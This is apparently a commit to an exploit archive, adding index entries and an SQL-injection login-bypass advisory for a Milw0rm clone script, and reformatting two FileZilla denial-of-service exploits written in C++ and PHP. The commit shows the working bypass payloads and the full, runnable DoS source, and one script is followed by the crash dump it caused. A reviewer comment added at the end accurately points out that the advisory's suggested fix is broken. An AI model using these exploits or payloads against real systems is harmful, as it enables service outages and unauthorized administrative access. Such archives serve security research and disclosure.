DB: 2015-06-16

3 new exploits
Offensive Security 2015-06-16 05:02:49 +00:00
parent 52c2474004
commit 961bfe01be
7 changed files with 478 additions and 288 deletions


@ -1110,7 +1110,7 @@ id,file,description,date,author,platform,type,port
1331,platforms/multiple/dos/1331.c,"Macromedia Flash Plugin <= 7.0.19.0 (Action) Denial of Service Exploit",2005-11-18,BassReFLeX,multiple,dos,0 1331,platforms/multiple/dos/1331.c,"Macromedia Flash Plugin <= 7.0.19.0 (Action) Denial of Service Exploit",2005-11-18,BassReFLeX,multiple,dos,0
1332,platforms/windows/remote/1332.pm,"MailEnable 1.54 Pro Universal IMAPD W3C Logging BoF Exploit",2005-11-20,y0,windows,remote,143 1332,platforms/windows/remote/1332.pm,"MailEnable 1.54 Pro Universal IMAPD W3C Logging BoF Exploit",2005-11-20,y0,windows,remote,143
1333,platforms/hardware/remote/1333.pm,"Google Search Appliance proxystylesheet XSLT Java Code Execution",2005-11-20,"H D Moore",hardware,remote,80 1333,platforms/hardware/remote/1333.pm,"Google Search Appliance proxystylesheet XSLT Java Code Execution",2005-11-20,"H D Moore",hardware,remote,80
1336,platforms/windows/dos/1336.cpp,"FileZilla Server Terminal 0.9.4d Buffer Overflow PoC",2005-11-21,"Inge Henriksen",windows,dos,0 1336,platforms/windows/dos/1336.cpp,"FileZilla Server Terminal 0.9.4d - Buffer Overflow PoC",2005-11-21,"Inge Henriksen",windows,dos,0
1337,platforms/php/webapps/1337.php,"Mambo <= 4.5.2 Globals Overwrite / Remote Command Exection Exploit",2005-11-22,rgod,php,webapps,0 1337,platforms/php/webapps/1337.php,"Mambo <= 4.5.2 Globals Overwrite / Remote Command Exection Exploit",2005-11-22,rgod,php,webapps,0
1338,platforms/hardware/dos/1338.pl,"Cisco PIX Spoofed TCP SYN Packets Remote Denial of Service Exploit",2005-11-23,"Janis Vizulis",hardware,dos,0 1338,platforms/hardware/dos/1338.pl,"Cisco PIX Spoofed TCP SYN Packets Remote Denial of Service Exploit",2005-11-23,"Janis Vizulis",hardware,dos,0
1339,platforms/windows/dos/1339.c,"FreeFTPD <= 1.0.10 (PORT Command) Denial of Service Exploit",2005-11-24,"Stefan Lochbihler",windows,dos,0 1339,platforms/windows/dos/1339.c,"FreeFTPD <= 1.0.10 (PORT Command) Denial of Service Exploit",2005-11-24,"Stefan Lochbihler",windows,dos,0
@ -2575,7 +2575,7 @@ id,file,description,date,author,platform,type,port
2898,platforms/php/webapps/2898.txt,"ThinkEdit 1.9.2 (render.php) Remote File Inclusion Vulnerability",2006-12-08,r0ut3r,php,webapps,0 2898,platforms/php/webapps/2898.txt,"ThinkEdit 1.9.2 (render.php) Remote File Inclusion Vulnerability",2006-12-08,r0ut3r,php,webapps,0
2899,platforms/php/webapps/2899.txt,"paFileDB 3.5.2/3.5.3 - Remote Login Bypass SQL Injection Vulnerability",2006-12-08,koray,php,webapps,0 2899,platforms/php/webapps/2899.txt,"paFileDB 3.5.2/3.5.3 - Remote Login Bypass SQL Injection Vulnerability",2006-12-08,koray,php,webapps,0
2900,platforms/windows/dos/2900.py,"Microsoft Windows - DNS Resolution - Remote Denial of Service PoC (MS06-041)",2006-12-09,"Winny Thomas",windows,dos,0 2900,platforms/windows/dos/2900.py,"Microsoft Windows - DNS Resolution - Remote Denial of Service PoC (MS06-041)",2006-12-09,"Winny Thomas",windows,dos,0
2901,platforms/windows/dos/2901.php,"Filezilla FTP Server 0.9.20b/0.9.21 (STOR) Denial of Service Exploit",2006-12-09,rgod,windows,dos,0 2901,platforms/windows/dos/2901.php,"Filezilla FTP Server 0.9.20b/0.9.21 - (STOR) Denial of Service Exploit",2006-12-09,rgod,windows,dos,0
2902,platforms/php/webapps/2902.pl,"TorrentFlux 2.2 (downloaddetails.php) Local File Disclosure Exploit",2006-12-09,r0ut3r,php,webapps,0 2902,platforms/php/webapps/2902.pl,"TorrentFlux 2.2 (downloaddetails.php) Local File Disclosure Exploit",2006-12-09,r0ut3r,php,webapps,0
2903,platforms/php/webapps/2903.pl,"TorrentFlux 2.2 (maketorrent.php) Remote Command Execution Exploit",2006-12-09,r0ut3r,php,webapps,0 2903,platforms/php/webapps/2903.pl,"TorrentFlux 2.2 (maketorrent.php) Remote Command Execution Exploit",2006-12-09,r0ut3r,php,webapps,0
2904,platforms/php/webapps/2904.txt,"mxBB Module Profile CP 0.91c Remote File Include Vulnerability",2006-12-09,bd0rk,php,webapps,0 2904,platforms/php/webapps/2904.txt,"mxBB Module Profile CP 0.91c Remote File Include Vulnerability",2006-12-09,bd0rk,php,webapps,0
@ -2588,7 +2588,7 @@ id,file,description,date,author,platform,type,port
2911,platforms/multiple/dos/2911.txt,"Sophos Antivirus - .CHM Chunk Name Length Memory Corruption PoC",2006-12-10,"Damian Put",multiple,dos,0 2911,platforms/multiple/dos/2911.txt,"Sophos Antivirus - .CHM Chunk Name Length Memory Corruption PoC",2006-12-10,"Damian Put",multiple,dos,0
2912,platforms/multiple/dos/2912.txt,"Sophos / Trend Micro Antivirus - .RAR File Denial of Service PoC",2006-12-10,"Damian Put",multiple,dos,0 2912,platforms/multiple/dos/2912.txt,"Sophos / Trend Micro Antivirus - .RAR File Denial of Service PoC",2006-12-10,"Damian Put",multiple,dos,0
2913,platforms/php/webapps/2913.php,"phpAlbum <= 0.4.1 Beta 6 (language.php) Local File Inclusion Exploit",2006-12-10,Kacper,php,webapps,0 2913,platforms/php/webapps/2913.php,"phpAlbum <= 0.4.1 Beta 6 (language.php) Local File Inclusion Exploit",2006-12-10,Kacper,php,webapps,0
2914,platforms/windows/dos/2914.php,"Filezilla FTP Server <= 0.9.21 (LIST/NLST) Denial of Service Exploit",2006-12-11,shinnai,windows,dos,0 2914,platforms/windows/dos/2914.php,"Filezilla FTP Server <= 0.9.21 - (LIST/NLST) Denial of Service Exploit",2006-12-11,shinnai,windows,dos,0
2915,platforms/hardware/dos/2915.c,"D-Link DWL-2000AP 2.11 (ARP Flood) Remote Denial of Service Exploit",2006-12-11,poplix,hardware,dos,0 2915,platforms/hardware/dos/2915.c,"D-Link DWL-2000AP 2.11 (ARP Flood) Remote Denial of Service Exploit",2006-12-11,poplix,hardware,dos,0
2916,platforms/windows/dos/2916.php,"Golden FTP server 1.92 - (USER/PASS) Heap Overflow PoC",2006-12-11,rgod,windows,dos,0 2916,platforms/windows/dos/2916.php,"Golden FTP server 1.92 - (USER/PASS) Heap Overflow PoC",2006-12-11,rgod,windows,dos,0
2917,platforms/php/webapps/2917.txt,"mxBB Module ErrorDocs 1.0 (common.php) Remote Inclusion Vulnerability",2006-12-11,bd0rk,php,webapps,0 2917,platforms/php/webapps/2917.txt,"mxBB Module ErrorDocs 1.0 (common.php) Remote Inclusion Vulnerability",2006-12-11,bd0rk,php,webapps,0
@ -23371,7 +23371,7 @@ id,file,description,date,author,platform,type,port
26217,platforms/php/webapps/26217.html,"CMS Made Simple 0.10 Lang.PHP Remote File Include Vulnerability",2005-08-31,groszynskif,php,webapps,0 26217,platforms/php/webapps/26217.html,"CMS Made Simple 0.10 Lang.PHP Remote File Include Vulnerability",2005-08-31,groszynskif,php,webapps,0
26218,platforms/linux/local/26218.txt,"Frox 0.7.18 - Arbitrary Configuration File Access Vulnerability",2005-09-01,rotor,linux,local,0 26218,platforms/linux/local/26218.txt,"Frox 0.7.18 - Arbitrary Configuration File Access Vulnerability",2005-09-01,rotor,linux,local,0
26219,platforms/windows/dos/26219.c,"WhitSoft Development SlimFTPd 3.17 - Remote Denial of Service Vulnerability",2005-09-02,"Critical Security",windows,dos,0 26219,platforms/windows/dos/26219.c,"WhitSoft Development SlimFTPd 3.17 - Remote Denial of Service Vulnerability",2005-09-02,"Critical Security",windows,dos,0
26220,platforms/windows/dos/26220.c,"FileZilla 2.2.15 FTP Client Hard-Coded Cipher Key Vulnerability",2005-09-02,m123303@richmond.ac.uk,windows,dos,0 26220,platforms/windows/dos/26220.c,"FileZilla 2.2.15 - FTP Client Hard-Coded Cipher Key Vulnerability",2005-09-02,m123303@richmond.ac.uk,windows,dos,0
26221,platforms/windows/remote/26221.txt,"Rediff Bol 7.0 Instant Messenger ActiveX Control Information Disclosure Vulnerability",2005-09-05,"Gregory R. Panakkal",windows,remote,0 26221,platforms/windows/remote/26221.txt,"Rediff Bol 7.0 Instant Messenger ActiveX Control Information Disclosure Vulnerability",2005-09-05,"Gregory R. Panakkal",windows,remote,0
26222,platforms/windows/local/26222.c,"Microsoft Windows 2000/2003/XP Keyboard Event Privilege Escalation Weakness",2005-08-06,"Andres Tarasco",windows,local,0 26222,platforms/windows/local/26222.c,"Microsoft Windows 2000/2003/XP Keyboard Event Privilege Escalation Weakness",2005-08-06,"Andres Tarasco",windows,local,0
26223,platforms/php/webapps/26223.txt,"Land Down Under 601/602/700/701/800/801 Events.PHP HTML Injection Vulnerability",2005-09-06,conor.e.buckley,php,webapps,0 26223,platforms/php/webapps/26223.txt,"Land Down Under 601/602/700/701/800/801 Events.PHP HTML Injection Vulnerability",2005-09-06,conor.e.buckley,php,webapps,0
@ -33455,7 +33455,7 @@ id,file,description,date,author,platform,type,port
37066,platforms/hardware/remote/37066.py,"Phoenix Contact ILC 150 ETH PLC Remote Control Script",2015-05-20,Photubias,hardware,remote,0 37066,platforms/hardware/remote/37066.py,"Phoenix Contact ILC 150 ETH PLC Remote Control Script",2015-05-20,Photubias,hardware,remote,0
37067,platforms/php/webapps/37067.txt,"WordPress FeedWordPress Plugin 2015.0426 - SQL Injection",2015-05-20,"Adrián M. F.",php,webapps,80 37067,platforms/php/webapps/37067.txt,"WordPress FeedWordPress Plugin 2015.0426 - SQL Injection",2015-05-20,"Adrián M. F.",php,webapps,80
37068,platforms/windows/dos/37068.py,"ZOC SSH Client Buffer Overflow Vulnerability (SEH)",2015-05-20,"Dolev Farhi",windows,dos,0 37068,platforms/windows/dos/37068.py,"ZOC SSH Client Buffer Overflow Vulnerability (SEH)",2015-05-20,"Dolev Farhi",windows,dos,0
37069,platforms/lin_x86/shellcode/37069.c,"Linux/x86 execve _/bin/sh_ - shellcode 26 bytes",2015-05-20,"Reza Behzadpour",lin_x86,shellcode,0 37069,platforms/lin_x86/shellcode/37069.c,"Linux/x86 - execve _/bin/sh_ - shellcode (26 bytes)",2015-05-20,"Reza Behzadpour",lin_x86,shellcode,0
37070,platforms/php/webapps/37070.txt,"WordPress Uploadify Integration Plugin 0.9.6 Multiple Cross Site Scripting Vulnerabilities",2012-04-06,waraxe,php,webapps,0 37070,platforms/php/webapps/37070.txt,"WordPress Uploadify Integration Plugin 0.9.6 Multiple Cross Site Scripting Vulnerabilities",2012-04-06,waraxe,php,webapps,0
37071,platforms/php/webapps/37071.txt,"CitrusDB 2.4.1 Local File Include and SQL Injection Vulnerabilities",2012-04-09,wacky,php,webapps,0 37071,platforms/php/webapps/37071.txt,"CitrusDB 2.4.1 Local File Include and SQL Injection Vulnerabilities",2012-04-09,wacky,php,webapps,0
37072,platforms/php/webapps/37072.txt,"Matterdaddy Market 1.1 Multiple SQL Injection Vulnerabilities",2012-04-10,"Chokri B.A",php,webapps,0 37072,platforms/php/webapps/37072.txt,"Matterdaddy Market 1.1 Multiple SQL Injection Vulnerabilities",2012-04-10,"Chokri B.A",php,webapps,0
@ -33629,7 +33629,7 @@ id,file,description,date,author,platform,type,port
37257,platforms/php/webapps/37257.txt,"FiverrScript CSRF Vulnerability (Add New Admin)",2015-06-10,"Mahmoud Gamal",php,webapps,80 37257,platforms/php/webapps/37257.txt,"FiverrScript CSRF Vulnerability (Add New Admin)",2015-06-10,"Mahmoud Gamal",php,webapps,80
37258,platforms/hardware/webapps/37258.py,"GeoVision (GeoHttpServer) Webcams Remote File Disclosure Exploit",2015-06-10,"Viktor Minin",hardware,webapps,0 37258,platforms/hardware/webapps/37258.py,"GeoVision (GeoHttpServer) Webcams Remote File Disclosure Exploit",2015-06-10,"Viktor Minin",hardware,webapps,0
37259,platforms/php/webapps/37259.txt,"ISPConfig 3.0.5.4p6 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",php,webapps,443 37259,platforms/php/webapps/37259.txt,"ISPConfig 3.0.5.4p6 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",php,webapps,443
37260,platforms/jsp/webapps/37260.txt,"Bonita BPM 6.5.1 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",jsp,webapps,80 37260,platforms/jsp/webapps/37260.txt,"Bonita BPM 6.5.1 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",jsp,webapps,8080
37261,platforms/hardware/webapps/37261.txt,"Alcatel-Lucent OmniSwitch - CSRF Vulnerability",2015-06-10,"RedTeam Pentesting",hardware,webapps,80 37261,platforms/hardware/webapps/37261.txt,"Alcatel-Lucent OmniSwitch - CSRF Vulnerability",2015-06-10,"RedTeam Pentesting",hardware,webapps,80
37262,platforms/linux/remote/37262.rb,"ProFTPD 1.3.5 Mod_Copy Command Execution",2015-06-10,metasploit,linux,remote,0 37262,platforms/linux/remote/37262.rb,"ProFTPD 1.3.5 Mod_Copy Command Execution",2015-06-10,metasploit,linux,remote,0
37263,platforms/php/webapps/37263.txt,"AnimaGallery 2.6 - Local File Inclusion",2015-06-10,d4rkr0id,php,webapps,80 37263,platforms/php/webapps/37263.txt,"AnimaGallery 2.6 - Local File Inclusion",2015-06-10,d4rkr0id,php,webapps,80
@ -33639,7 +33639,7 @@ id,file,description,date,author,platform,type,port
37268,platforms/windows/dos/37268.py,"GoldWave 6.1.2 Local Crash PoC",2015-06-12,0neb1n,windows,dos,0 37268,platforms/windows/dos/37268.py,"GoldWave 6.1.2 Local Crash PoC",2015-06-12,0neb1n,windows,dos,0
37270,platforms/php/webapps/37270.txt,"Nakid CMS - Multiple Vulnerabilities",2015-06-12,"John Page",php,webapps,80 37270,platforms/php/webapps/37270.txt,"Nakid CMS - Multiple Vulnerabilities",2015-06-12,"John Page",php,webapps,80
37271,platforms/multiple/webapps/37271.txt,"Opsview <= 4.6.2 - Multiple XSS Vulnerabilities",2015-06-12,"Dolev Farhi",multiple,webapps,80 37271,platforms/multiple/webapps/37271.txt,"Opsview <= 4.6.2 - Multiple XSS Vulnerabilities",2015-06-12,"Dolev Farhi",multiple,webapps,80
37272,platforms/jsp/webapps/37272.txt,"ZCMS 1.1 - Multiple Vulnerabilities",2015-06-12,"John Page",jsp,webapps,0 37272,platforms/jsp/webapps/37272.txt,"ZCMS 1.1 - Multiple Vulnerabilities",2015-06-12,"John Page",jsp,webapps,8080
37274,platforms/php/webapps/37274.txt,"WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal",2015-06-12,"Larry W. Cashdollar",php,webapps,80 37274,platforms/php/webapps/37274.txt,"WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal",2015-06-12,"Larry W. Cashdollar",php,webapps,80
37275,platforms/php/webapps/37275.txt,"WordPress Aviary Image Editor Add On For Gravity Forms 3.0 Beta Shell Upload",2015-06-12,"Larry W. Cashdollar",php,webapps,80 37275,platforms/php/webapps/37275.txt,"WordPress Aviary Image Editor Add On For Gravity Forms 3.0 Beta Shell Upload",2015-06-12,"Larry W. Cashdollar",php,webapps,80
37277,platforms/php/webapps/37277.txt,"concrete5 index.php/tools/required/files/search_dialog ocID Parameter XSS",2012-05-20,AkaStep,php,webapps,0 37277,platforms/php/webapps/37277.txt,"concrete5 index.php/tools/required/files/search_dialog ocID Parameter XSS",2012-05-20,AkaStep,php,webapps,0
@ -33649,3 +33649,6 @@ id,file,description,date,author,platform,type,port
37281,platforms/php/webapps/37281.txt,"concrete5 index.php/tools/required/files/import Multiple Parameter XSS",2012-05-20,AkaStep,php,webapps,0 37281,platforms/php/webapps/37281.txt,"concrete5 index.php/tools/required/files/import Multiple Parameter XSS",2012-05-20,AkaStep,php,webapps,0
37282,platforms/php/webapps/37282.txt,"concrete5 index.php/tools/required/files/bulk_properties searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0 37282,platforms/php/webapps/37282.txt,"concrete5 index.php/tools/required/files/bulk_properties searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
37283,platforms/php/webapps/37283.txt,"AZ Photo Album Cross Site Scripting and Arbitrary File Upload Vulnerabilities",2012-05-20,"Eyup CELIK",php,webapps,0 37283,platforms/php/webapps/37283.txt,"AZ Photo Album Cross Site Scripting and Arbitrary File Upload Vulnerabilities",2012-05-20,"Eyup CELIK",php,webapps,0
37286,platforms/windows/dos/37286.py,"Filezilla 3.11.0.2 - SFTP Module Denial of Service Vulnerability",2015-06-15,3unnym00n,windows,dos,0
37290,platforms/php/webapps/37290.txt,"Milw0rm Clone Script 1.0 - (Auth Bypass) SQL Injection Vulnerability",2015-06-15,"walid naceri",php,webapps,0
37291,platforms/windows/dos/37291.py,"Putty 0.64 - Denial of Service Vulnerability",2015-06-15,3unnym00n,windows,dos,0


platforms/php/webapps/37290.txt Executable file

@ -0,0 +1,46 @@
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
| Exploit Title: Milw0rm Clone Script v1.0 (Auth Bypass) SQL Injection Vulnerability |
| Date: 06.13.2015 |
| Exploit Daddy: Walid Naceri |
| Vendor Homepage: http://milw0rm.sourceforge.net/ |
| Software Link: http://sourceforge.net/projects/milw0rm/files/milw0rm.rar/download |
| Version: v1.0 |
| Tested On: Kali Linux, Mac, Windows |
|><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><|
| Website exploiter: WwW.security-Dz.Com |
| CALLINGout: 1337day/inj3ct0r Please admit that they got your server haha CIA |
| Sorry: Sorry pancaker, you missed that one :( |
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
### vuln codez admin/login.php ###
<?
$usr = htmlspecialchars(trim($_POST['usr'])); ---- what are you doing?
$pwd = htmlspecialchars(trim($_POST['pwd'])); ---- are you sure that you are a programmer?
if($usr && $pwd){
$login = mysql_query("SELECT * FROM `site_info` WHERE `adm_usr`='".$usr."' AND `adm_pwd`='".md5($pwd)."';");
$row = mysql_num_rows($login);
----Bla Bla Bla--------
### manual ###
Go to the login admin panel :)
Exploit 1:
USER: ADMIN' OR ''='
PASS: ADMIN' OR ''='
Exploit 2:
USER: ADMIN' OR 1=1#
PASS: Anything Bro :)
### How to fix, learn bro some php again :) ###
$usr = htmlspecialchars(trim(mysql_real_escape_string($_POST['usr'])));
$usr = htmlspecialchars(trim(mysql_real_escape_string($_POST['pwd'])));
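Review bot: The remediation quoted at the end of the advisory has a copy-paste error: the second line assigns to `$usr` while reading `$_POST['pwd']`, so it overwrites the username and leaves the password that reaches the `mysql_query(...)` call unescaped, meaning the injection on the password field is not closed by the fix as written. Even with the corrected `$pwd = mysql_real_escape_string(trim($_POST['pwd']));`, escaping is the weaker fix; the query should be rewritten with a prepared statement and bound parameters (mysqli or PDO), since the `mysql_*` extension is deprecated and string-built SQL remains fragile. `htmlspecialchars()` belongs at output time, not before the database call, and wrapping it around the escaped value here changes the stored username rather than protecting the query. The unsalted `md5($pwd)` comparison is a separate weakness the advisory does not mention; `password_hash()`/`password_verify()` would be the appropriate replacement.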


@ -1,110 +1,110 @@
/* /*
FileZillaDoS.cpp FileZillaDoS.cpp
FileZilla Server Terminal 0.9.4d DoS PoC by Inge Henriksen. FileZilla Server Terminal 0.9.4d DoS PoC by Inge Henriksen.
Read the disclaimer at http://ingehenriksen.blogspot.com before using. Read the disclaimer at http://ingehenriksen.blogspot.com before using.
Made to work with Microsoft(R) Visual C++(R), to use link "WS2_32.lib". Made to work with Microsoft(R) Visual C++(R), to use link "WS2_32.lib".
*/ */
#include "stdafx.h" #include "stdafx.h"
#include <iostream> #include <iostream>
#include "Winsock2.h" #include "Winsock2.h"
#define BUFFSIZE 10000 #define BUFFSIZE 10000
#define ATTACK_BUFFSIZE 5000 #define ATTACK_BUFFSIZE 5000
using namespace std; using namespace std;
int _tmain(int argc, _TCHAR* argv[]) int _tmain(int argc, _TCHAR* argv[])
{ {
cout << "FileZilla Server Terminal 0.9.4d DoS PoC by Inge Henriksen." << endl; cout << "FileZilla Server Terminal 0.9.4d DoS PoC by Inge Henriksen." << endl;
cout << "Read the disclaimer at http://ingehenriksen.blogspot.com before using." << endl; cout << "Read the disclaimer at http://ingehenriksen.blogspot.com before using." << endl;
if (argc!=3) // Exit if wrong number of arguments if (argc!=3) // Exit if wrong number of arguments
{ {
cerr << "Error: Wrong number of arguments" << endl; cerr << "Error: Wrong number of arguments" << endl;
cout << "Usage: " << argv[0] << " <Target IP> <Target Port>" << endl; cout << "Usage: " << argv[0] << " <Target IP> <Target Port>" << endl;
cout << "Example: " << argv[0] << " 192.168.2.100 21" << endl; cout << "Example: " << argv[0] << " 192.168.2.100 21" << endl;
return (-1); return (-1);
} }
in_addr IPAddressData; in_addr IPAddressData;
__int64 counterVal; __int64 counterVal;
char* bufferData; char* bufferData;
char* attackStringData; char* attackStringData;
SOCKET sock; SOCKET sock;
sockaddr_in sinInterface; sockaddr_in sinInterface;
WSADATA wsaData; WSADATA wsaData;
int iResult = WSAStartup(MAKEWORD(2, 2), &wsaData); // Use Winsock version 2.2 int iResult = WSAStartup(MAKEWORD(2, 2), &wsaData); // Use Winsock version 2.2
if (iResult != NO_ERROR) if (iResult != NO_ERROR)
{ {
cerr << "Error: WSAStartup() failed" << endl; cerr << "Error: WSAStartup() failed" << endl;
return(-1); return(-1);
} }
int recvRet; int recvRet;
char tmpBuffer[BUFFSIZE]; char tmpBuffer[BUFFSIZE];
char tmpAttackBuffer[ATTACK_BUFFSIZE]; char tmpAttackBuffer[ATTACK_BUFFSIZE];
tmpAttackBuffer[0] = 'U'; tmpAttackBuffer[0] = 'U';
tmpAttackBuffer[1] = 'S'; tmpAttackBuffer[1] = 'S';
tmpAttackBuffer[2] = 'E'; tmpAttackBuffer[2] = 'E';
tmpAttackBuffer[3] = 'R'; tmpAttackBuffer[3] = 'R';
tmpAttackBuffer[4] = ' '; tmpAttackBuffer[4] = ' ';
int i; int i;
int j=5; int j=5;
for (i=j;i<ATTACK_BUFFSIZE-6;i++) for (i=j;i<ATTACK_BUFFSIZE-6;i++)
{ {
int k; int k;
for(k=j;k<=i;k++) for(k=j;k<=i;k++)
{ {
tmpAttackBuffer[k] = 'A'; tmpAttackBuffer[k] = 'A';
} }
tmpAttackBuffer[k] = '\n'; tmpAttackBuffer[k] = '\n';
tmpAttackBuffer[k+1] = '\0'; tmpAttackBuffer[k+1] = '\0';
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP ); sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP );
if ((int)(sock)==-1) if ((int)(sock)==-1)
{ {
cerr << "Error: Could not create socket" << endl; cerr << "Error: Could not create socket" << endl;
return(-1); return(-1);
} }
sinInterface.sin_family = AF_INET; sinInterface.sin_family = AF_INET;
sinInterface.sin_addr.s_addr = inet_addr(argv[1]); sinInterface.sin_addr.s_addr = inet_addr(argv[1]);
sinInterface.sin_port = htons(atoi(argv[2])); sinInterface.sin_port = htons(atoi(argv[2]));
if ((connect(sock,(sockaddr*)&sinInterface ,sizeof(sockaddr_in))!=SOCKET_ERROR)) if ((connect(sock,(sockaddr*)&sinInterface ,sizeof(sockaddr_in))!=SOCKET_ERROR))
{ {
int sendResult = send( sock, tmpAttackBuffer , (int)strlen(tmpAttackBuffer), 0); int sendResult = send( sock, tmpAttackBuffer , (int)strlen(tmpAttackBuffer), 0);
cout << "Sent " << strlen(tmpAttackBuffer) << " characters" << endl; cout << "Sent " << strlen(tmpAttackBuffer) << " characters" << endl;
if ( sendResult != SOCKET_ERROR ) if ( sendResult != SOCKET_ERROR )
{ {
recvRet = SOCKET_ERROR; recvRet = SOCKET_ERROR;
for (int i=0;i<BUFFSIZE;i++) for (int i=0;i<BUFFSIZE;i++)
tmpBuffer[i]=(char)0; tmpBuffer[i]=(char)0;
recvRet = recv( sock, tmpBuffer , BUFFSIZE-1, 0 ); recvRet = recv( sock, tmpBuffer , BUFFSIZE-1, 0 );
if ( recvRet == SOCKET_ERROR ) if ( recvRet == SOCKET_ERROR )
cerr << "Error: recv() failed" << endl; cerr << "Error: recv() failed" << endl;
else else
cout << "Response is: " << endl << tmpBuffer << endl;; cout << "Response is: " << endl << tmpBuffer << endl;;
} }
else else
cerr << "Error: send() failed" << endl; cerr << "Error: send() failed" << endl;
if (shutdown(sock,0)==SOCKET_ERROR) if (shutdown(sock,0)==SOCKET_ERROR)
cerr << "Error: shutdown() failed" << endl; cerr << "Error: shutdown() failed" << endl;
} }
else else
cerr << "Error: connect() failed" << endl; cerr << "Error: connect() failed" << endl;
if (closesocket(sock)==SOCKET_ERROR) if (closesocket(sock)==SOCKET_ERROR)
cerr << "Error: closesocket() failed" << endl; cerr << "Error: closesocket() failed" << endl;
} // End for loop } // End for loop
return 0; return 0;
} }
// milw0rm.com [2005-11-21] // milw0rm.com [2005-11-21]


@ -1,104 +1,104 @@
<?php <?php
# Filezilla FTP Server 0.9.20 beta / 0.9.21 "STOR" Denial Of Service # Filezilla FTP Server 0.9.20 beta / 0.9.21 "STOR" Denial Of Service
# by rgod # by rgod
# mail: retrog at alice dot it # mail: retrog at alice dot it
# site: http://retrogod.altervista.org # site: http://retrogod.altervista.org
# tested on WinXP sp2 # tested on WinXP sp2
error_reporting(E_ALL); error_reporting(E_ALL);
$service_port = getservbyname('ftp', 'tcp'); $service_port = getservbyname('ftp', 'tcp');
$address = gethostbyname('192.168.1.3'); $address = gethostbyname('192.168.1.3');
$user="test"; $user="test";
$pass="test"; $pass="test";
$junk.="../../../sun-tzu/../../../sun-tzu/../../../sun-tzu"; $junk.="../../../sun-tzu/../../../sun-tzu/../../../sun-tzu";
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) { if ($socket < 0) {
echo "socket_create() failed:\n reason: " . socket_strerror($socket) . "\n"; echo "socket_create() failed:\n reason: " . socket_strerror($socket) . "\n";
} else { } else {
echo "OK.\n"; echo "OK.\n";
} }
$result = socket_connect($socket, $address, $service_port); $result = socket_connect($socket, $address, $service_port);
if ($result < 0) { if ($result < 0) {
echo "socket_connect() failed:\n reason: ($result) " . socket_strerror($result) . "\n"; echo "socket_connect() failed:\n reason: ($result) " . socket_strerror($result) . "\n";
} else { } else {
echo "OK.\n"; echo "OK.\n";
} }
$out=socket_read($socket, 240); $out=socket_read($socket, 240);
echo $out; echo $out;
$in = "USER ".$user."\r\n"; $in = "USER ".$user."\r\n";
socket_write($socket, $in, strlen ($in)); socket_write($socket, $in, strlen ($in));
$out=socket_read($socket, 80); $out=socket_read($socket, 80);
echo $out; echo $out;
$in = "PASS ".$pass."\r\n"; $in = "PASS ".$pass."\r\n";
socket_write($socket, $in, strlen ($in)); socket_write($socket, $in, strlen ($in));
$out=socket_read($socket, 80); $out=socket_read($socket, 80);
echo $out; echo $out;
$in = "PASV ".$junk."\r\n"; $in = "PASV ".$junk."\r\n";
socket_write($socket, $in, strlen ($in)); socket_write($socket, $in, strlen ($in));
$in = "PORT ".$junk."\r\n"; $in = "PORT ".$junk."\r\n";
socket_write($socket, $in, strlen ($in)); socket_write($socket, $in, strlen ($in));
$in = "STOR ".$junk."\r\n"; $in = "STOR ".$junk."\r\n";
socket_write($socket, $in, strlen ($in)); socket_write($socket, $in, strlen ($in));
socket_close($socket); socket_close($socket);
/* /*
07:04:28.270 pid=0F84 tid=03A0 EXCEPTION (first-chance) 07:04:28.270 pid=0F84 tid=03A0 EXCEPTION (first-chance)
---------------------------------------------------------------- ----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION writing [0000007C]) Exception C0000005 (ACCESS_VIOLATION writing [0000007C])
---------------------------------------------------------------- ----------------------------------------------------------------
EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EBX=00476540: 0A 00 00 00 43 00 44 00-55 00 50 00 00 00 00 00 EBX=00476540: 0A 00 00 00 43 00 44 00-55 00 50 00 00 00 00 00
ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDX=00D7E2F4: 00 00 00 00 A8 56 37 00-00 00 00 00 00 00 00 00 EDX=00D7E2F4: 00 00 00 00 A8 56 37 00-00 00 00 00 00 00 00 00
ESP=00D7E2C8: 00 00 00 00 F0 6E 37 00-2F 93 41 00 F4 E2 D7 00 ESP=00D7E2C8: 00 00 00 00 F0 6E 37 00-2F 93 41 00 F4 E2 D7 00
EBP=0000000C: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? EBP=0000000C: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDI=00000060: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? EDI=00000060: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EIP=00449427: C6 46 7C 01 8B 4F 18 B8-08 00 00 00 3B C8 72 05 EIP=00449427: C6 46 7C 01 8B 4F 18 B8-08 00 00 00 3B C8 72 05
--> MOV BYTE PTR [ESI+7C],01 --> MOV BYTE PTR [ESI+7C],01
